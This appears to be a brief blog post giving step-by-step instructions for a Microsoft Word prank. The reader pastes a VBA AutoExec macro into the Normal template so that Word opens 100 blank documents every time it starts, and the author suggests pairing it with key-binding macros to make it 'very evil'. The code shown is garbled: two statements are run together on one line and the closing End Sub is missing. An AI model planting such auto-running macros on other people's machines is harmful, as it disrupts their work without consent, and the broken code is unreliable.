This prank is simple. Every time you open up word it will create 100 documents. Nothing to evil Nothing to mean… but damn is it annoying. You can combine it with past macros, like key bindings and it could be very evil. Maybe I’ll add an update to the code later in the day =)
Step 1: Open Microsoft Word
Step 2: Press Alt F11
Step 3: Copy the code below into your normal template:
Sub AutoExec()
Dim x As Document
Set x = ActiveDocumentFor i = 1 To 100
Documents.Add DocumentType:=wdNewBlankDocument
Next i
Step 4: Save

